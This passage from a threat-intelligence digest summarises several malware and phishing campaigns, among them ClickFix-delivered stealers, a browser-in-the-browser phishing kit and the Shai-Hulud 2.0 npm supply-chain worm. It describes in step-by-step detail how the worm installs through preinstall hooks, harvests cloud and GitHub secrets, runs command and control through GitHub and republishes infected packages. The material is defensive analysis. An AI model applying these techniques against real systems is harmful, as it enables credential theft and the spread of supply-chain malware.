– Search engine manipulation
– Malvertising
– Fraudulent but legitimate-looking download sites
– Fake “manual readers,” PDF utilities, and system tools
• All malicious apps are fully functional and digitally signed, helping them bypass endpoint protection and user suspicion.

Infection Distribution
• ~80% of infections detected in the United States
• Remaining spread globally
• High infection rates observed in healthcare, manufacturing, and construction, where employees frequently download manuals and tools.
• Lures are not localized — most are English-based but affect worldwide users due to search-driven distribution.

Capabilities & Behavior
• Malware deploys modular payloads enabling:
– Credential theft
– Downloading additional components
– Machine ID generation via registry queries
• Establishes persistence via:
– Scheduled tasks using XML, not classic autorun or registry methods
– Obfuscated JavaScript executed on a recurring schedule, resisting removal
• Signed binaries imitate true installer behavior, increasing trust and bypassing enterprise software policies.

Delivery & Infrastructure
• Initial access delivered not via phishing, but through:
– Hijacked search results
– Paid advertisements
• Payloads communicate over encrypted channels with attacker-controlled servers using:
– Rapid domain rotation
– Commodity hosting providers like Namecheap
• Infrastructure supports dynamic payload updates and data exfiltration.

Threat Impact
• Facilitates long-term access and potential resale of compromised systems
• Provides a platform for:
– Credential harvesting
– Deployment of secondary malware
– Ransomware staging
• Campaign leverages certificate rotation to maintain trust and evade revocation or detection.

Analyst Note
• Detection varies by region based on certificate validation rules, endpoint security maturity, and software supply-chain controls.
• Organizations with weak download policies or decentralized software acquisition are at high risk.

Reference
https://www.bankinfosecurity.asia/tamperedchef-exploits-signed-apps-for-stealth-a-30089

22. “Sneaky 2FA” Browser-in-the-Browser Attacks Use Fake Login Windows to Steal Credentials
    A new Phishing-as-a-Service (PhaaS) kit called Sneaky 2FA enables attackers to deploy highly convincing Browser-in-the-Browser (BitB) phishing attacks that mimic real authentication pop-ups. These fake windows can steal usernames and passwords by visually imitating legitimate login prompts, including realistic address bars, window frames, and trusted brand layouts.

Key Technical Details
• Sneaky 2FA is an obfuscated, licensed phishing toolkit sold on underground markets.
• Attackers create fake browser pop-up windows entirely in HTML + CSS, rendering:
– Fake address bar with a spoofed legitimate URL
– Realistic browser frame
– Authentic-looking login forms
• Victims believe they’re logging in to trusted services, but credentials are sent directly to the attacker.
• Password managers can detect these attacks by refusing to autofill credentials on HTML-based fake windows.

Capabilities & Evasion Techniques
• Toolkit blocks security tools and automated crawlers by redirecting them to benign content.
• BitB pop-up dynamically adapts to:
– User’s operating system
– Browser appearance (Chrome, Firefox, Edge)
• Attackers use short-lived domains that rotate rapidly to evade blocklists (“burn and replace”).
• High-value targets only see the phishing interface, while low-value visits are redirected elsewhere.

Threat Impact
• Enables credential theft even when victims visually verify the URL bar.
• Bypasses common phishing awareness tips (e.g., “check the URL”).
• Allows seamless stealing of usernames, passwords, and MFA-related data due to realistic interface mimicry.

User Safety Considerations
• A password manager is the strongest defense — it autofills credentials only on real login forms, not HTML imitations.
• Pairing MFA with password managers significantly reduces risk.
• Users should avoid clicking unsolicited links and verify messages before engaging.

Additional Defense Layer
• Malwarebytes Browser Guard can detect and block BitB-style attacks using heuristic analysis.

Reference
https://www.malwarebytes.com/blog/news/2025/11/attackers-are-using-sneaky-2fa-to-create-fake-sign-in-windows-that-look-real

23. EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT
    A newly observed malware campaign, tracked as EVALUSION, is leveraging ClickFix social engineering techniques to deliver Amatera Stealer and NetSupport RAT. The activity was detected in November 2025 and showcases increasingly deceptive user-triggered infection chains involving command execution through the Windows Run dialog.

Key Technical Details
• The campaign uses ClickFix, a social engineering tactic where victims are tricked into pasting malicious commands into the Windows Run dialog under the guise of completing a CAPTCHA.
• Executing the command launches mshta.exe, which runs a malicious PowerShell script that downloads a .NET payload from MediaFire.
• This payload is a PureCrypter-packed Amatera Stealer DLL, injected into the MSBuild.exe process for stealthy execution.
• After data theft, Amatera fetches and runs NetSupport RAT, but only if the victim is deemed high-value (domain-joined or crypto-wallet detected).

Amatera Stealer Details
• Successor to ACR (“AcridRain”) Stealer, previously sold via MaaS.
• Subscription pricing ranges from $199/month to $1,499/year.
• Supports extensive data exfiltration from:
– Crypto-wallets
– Browsers
– Messaging applications
– FTP clients
– Email services
• Uses WoW64 SysCalls to bypass user-mode hooking in EDR, AV, and sandboxes.

NetSupport RAT Deployment Logic
• Triggered only when Amatera detects:
– The system is part of a domain
– Valuable files (e.g., crypto wallets) are present
• This selective deployment optimizes threat actor resources and minimizes detection.

Related Observed Campaigns
Multiple phishing operations are concurrently distributing malware including XWorm, NetSupport RAT, and credential stealers:

• XWorm Distribution
  – Via email with VBS attachments posing as invoices
  – Batch→PowerShell loader chain used to deliver payload
• SmartApeSG / HANEYMANEY / ZPHP Campaign
  – Compromised websites injected with JavaScript
  – Redirect victims to fake Cloudflare Turnstile ClickFix prompts
  – Deliver NetSupport RAT
• Fake Booking.com pages
  – Display misleading CAPTCHA checks
  – Use ClickFix lures to execute credential-stealing PowerShell commands
• Spoofed internal email alerts
  – Claim blocked invoices, packages, or RFQs
  – Trick victims into entering credentials on phishing portals
• Cephas phishing kit
  – Notable for obfuscation using invisible random characters
  – Evades YARA signatures and anti-phishing scanners
• Tycoon 2FA phishing kit
  – Leads users to realistic malicious login pages
  – Designed for MFA-bypass and credential harvesting

Threat Impact
• Highly successful social engineering through fake reCAPTCHA/ClickFix prompts
• Multi-stage, stealthy payload delivery
• Deployment of two powerful tools:
– Amatera Stealer (high-value data collection)
– NetSupport RAT (full remote control)
• Strong evasion characteristics: PureCrypter, SysCalls, code obfuscation, selective payloading
• Growing overlap with phishing, RATs, credential theft, and malware-as-a-service ecosystems

Reference
https://thehackernews.com/2025/11/new-evalusion-clickfix-campaign.html

Shai-Hulud 2.0 Campaign Targets Cloud and Developer Ecosystems
Shai-Hulud 2.0 is a highly advanced supply-chain malware campaign that targets developers and CI/CD environments by abusing npm packages, Bun runtime, GitHub Actions, and multi-cloud secret managers. It steals credentials and secrets from AWS, GCP, Azure, npm, and GitHub, then automatically backdoors all npm packages maintained by the victim, republishing them with malicious preinstall hooks. This creates a wormable, large-scale supply chain threat with the potential to impact thousands of downstream users.

Initial Access and Loader (setup_bun.js)

Delivered as a malicious npm package with “preinstall”: “node setup_bun.js” in package.json.

setup_bun.js runs automatically during npm install and:

Checks for Bun runtime using where (Windows) or which (Linux/macOS).

If missing, silently installs Bun using official bun.sh install scripts (PowerShell or curl | bash), mimicking legitimate behavior.

Reloads PATH (Windows via registry and PowerShell, Unix via sourcing .bashrc, .zshrc, etc.) so Bun is visible.

Locates Bun (global or locally bundled) and executes the main payload: bun bun_environment.js.

Execution Logic (bun_environment.js / jy1)

jy1() is the main entry point and decides behavior based on environment:

CI/CD mode: if variables like GITHUB_ACTIONS, CODEBUILD_BUILD_NUMBER, CIRCLE_SHA1, BUILDKITE, PROJECT_ID are present → run inline to harvest as many credentials as possible from build pipelines.

Developer workstation mode: spawns a detached background process (Bun.spawn().unref() with POSTINSTALL_BG=1), letting npm install finish quickly (2–3 seconds) while the child process quietly continues credential theft.

Persistence / privilege & security control handling on Linux via:

cQ0() – checks if /home/agent/agent is already running.

pQ0() – attempts privilege escalation (passwordless sudo or abusing Docker privileged containers to modify sudoers).

gQ0() – disables security controls by tampering with systemd-resolved config and flushing iptables (OUTPUT, DOCKER-USER) to remove network filtering.

Credential Theft: npm, GitHub, and Multi-Cloud Environments (aL0)

npm tokens

Reads .npmrc in current directory and user home.

Extracts _authToken entries via regex and validates them using /-/whoami to confirm the token and fetch the npm username.

Validated tokens and usernames are later used for package enumeration and republishing.

GitHub credentials

Uses stolen GitHub tokens for:

Repository creation (for C2).

Workflow manipulation and secrets theft.

Installing self-hosted GitHub Actions runners on victim systems.

AWS credential harvesting

Uses standard AWS SDK credential chain to collect:

AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, session tokens, account IDs, expiration, and metadata.

Reads ~/.aws/config and ~/.aws/credentials (or paths from AWS_CONFIG_FILE / AWS_SHARED_CREDENTIALS_FILE).

Targets container credentials (ECS/EKS task creds via metadata endpoints), enabling lateral movement in cloud environments.

GCP credential harvesting

Looks for GOOGLE_APPLICATION_CREDENTIALS and loads service account JSON keys.

Locates gcloud SDK config (via CLOUDSDK_CONFIG, %APPDATA%\gcloud, ~/.config/gcloud) and extracts cached auth tokens.

Checks for ADC JSON (Application Default Credentials) and reads tokens and keys if present.

Azure credential harvesting

Scans multiple Azure-related environment variables to support:

Service Principal + client secret (tenant, client ID, client secret).

Certificate-based auth (AZURE_CLIENT_CERTIFICATE_PATH, optional password).

Username/password auth (legacy).

Workload Identity (Kubernetes, via AZURE_TENANT_ID, AZURE_CLIENT_ID, AZURE_FEDERATED_TOKEN_FILE).

Azure Pod Identity (via AZURE_POD_IDENTITY_AUTHORITY_HOST and IMDS-based token retrieval).

Active Secret Manager Abuse (AWS, GCP, Azure)

Goes beyond static keys to live secret stores:

AWS Secrets Manager: validates creds via STS GetCallerIdentity, then iterates 17 AWS regions, calling ListSecrets and GetSecretValue.

GCP Secret Manager:

Validates access via getAccessToken().

Lists projects via Resource Manager API.

For each project, enumerates secrets and fetches {secretName}/versions/latest.

Azure Key Vault:

Authenticates using DefaultAzureCredential.

Enumerates Microsoft.KeyVault/vaults via Azure Resource Manager.

Iterates and reads all secrets from each vault.

TruffleHog Integration for File-System Secret Discovery

Automatically downloads the latest TruffleHog release from GitHub at runtime (no hard-coded version).

Caches the binary; if not cached, fetches and extracts it, then marks it executable.

Runs TruffleHog against the user’s home directory with JSON output and a 10-minute timeout.

Aggregates:

Discovered secrets

Errors

Scan duration and exit code

Stores results as a structured report for exfiltration.

GitHub-based Command-and-Control (C2) and Secret Exfiltration

Per-victim C2 repository creation

Uses stolen GitHub token with Octokit repos.createForAuthenticatedUser() to create a public repo named with an 18-character random string and description:

“Shai-Hulud: The Second Coming.”

Saves owner/repo as this.gitRepo for later C2 and exfil.

Self-hosted GitHub Actions runner deployment

Checks if the token has the workflow scope (via x-oauth-scopes).

Requests a runner registration token using /repos/{owner}/{repo}/actions/runners/registration-token.

Downloads the appropriate GitHub runner for Linux/Windows/macOS and installs it into a hidden directory ($HOME/.dev-env or similar).

Registers runner as “SHA1HULUD” and runs it in the background (nohup or hidden PowerShell), providing persistent remote execution.

C2 via GitHub Discussions

Creates a workflow .github/workflows/discussion.yaml that triggers on discussion events.

Allows attackers to execute commands on the infected machine simply by posting messages in GitHub Discussions in the C2 repo.

Malicious workflow for secrets exfiltration

Injects a second workflow into all accessible repositories:

Creates a temporary branch like add-linter-workflow-{timestamp} to look benign.

Adds a workflow named “Code Formatter” that triggers on push.

Uses toJSON(secrets) to serialize all GitHub repository secrets (cloud keys, API tokens, DB passwords, signing keys).

Uploads secrets as an artifact named formatting.

Monitors GitHub Actions API for workflow runs:

Polls every 2 seconds up to 30 seconds for completion.

Once completed, enumerates artifacts, retrieves the pre-signed artifact URL, downloads the ZIP, and extracts format.json containing the stolen secrets.

Data Aggregation and Exfiltration via GitHub Repo

Aggregates four main JSON files and pushes them to the attacker-controlled GitHub repo:

contents.json – system metadata (OS, hostname, user, GitHub auth status).

environment.json – full environment dump (including many credentials and configuration secrets).

cloud.json – contents pulled from AWS Secrets Manager, GCP Secret Manager, and Azure Key Vault.

truffleSecrets.json – TruffleHog scan results (hardcoded secrets in code/config).

Supply-Chain Propagation via npm (Highly Wormable)

Uses the validated npm token and username to enumerate victim-maintained packages via NPM search API (/-/v1/search?maintainer=…) for up to 100 packages, sorted by monthly downloads to prioritize high-impact packages.

For each package:

Downloads original tarball from npm.

Extracts it to a temp directory named like NPM-update-… (to resemble legitimate tooling).

Modifies package.json to add or overwrite “preinstall”: “node setup_bun.js”.

Injects setup_bun.js and bun_environment.js into the package.

Repackages and publishes a new version using the victim’s npm auth token, typically with a minor patch bump (looks like a normal bugfix release).

Result: any downstream user running npm install on these packages gets infected, driving exponential spread across the npm ecosystem.

Destructive Failsafe

If the malware fails to obtain both a valid npm token and a valid GitHub token, it may execute destructive commands attempting to delete all files in the user’s home directory, acting as a failsafe / anti-analysis mechanism.

Defensive Notes (High-Level)

Monitor for:

Unexpected Bun installations triggered during npm install.

preinstall hooks added/changed in package.json unexpectedly.

Suspicious creation of GitHub repos with descriptions like “Shai-Hulud: The Second Coming.”

Unusual self-hosted GitHub Actions runners named SHA1HULUD.

New workflows such as discussion.yaml and “Code Formatter” that serialize secrets and upload artifacts named formatting.

For detection/hunting (from Trend Micro guidance), a sample pattern:

malName:*SHULUD* AND eventName:MALWARE_DETECTION AND LogType:detection

Reference
https://www.trendmicro.com/en_us/research/25/k/shai-hulud-2-0-targets-cloud-and-developer-systems.html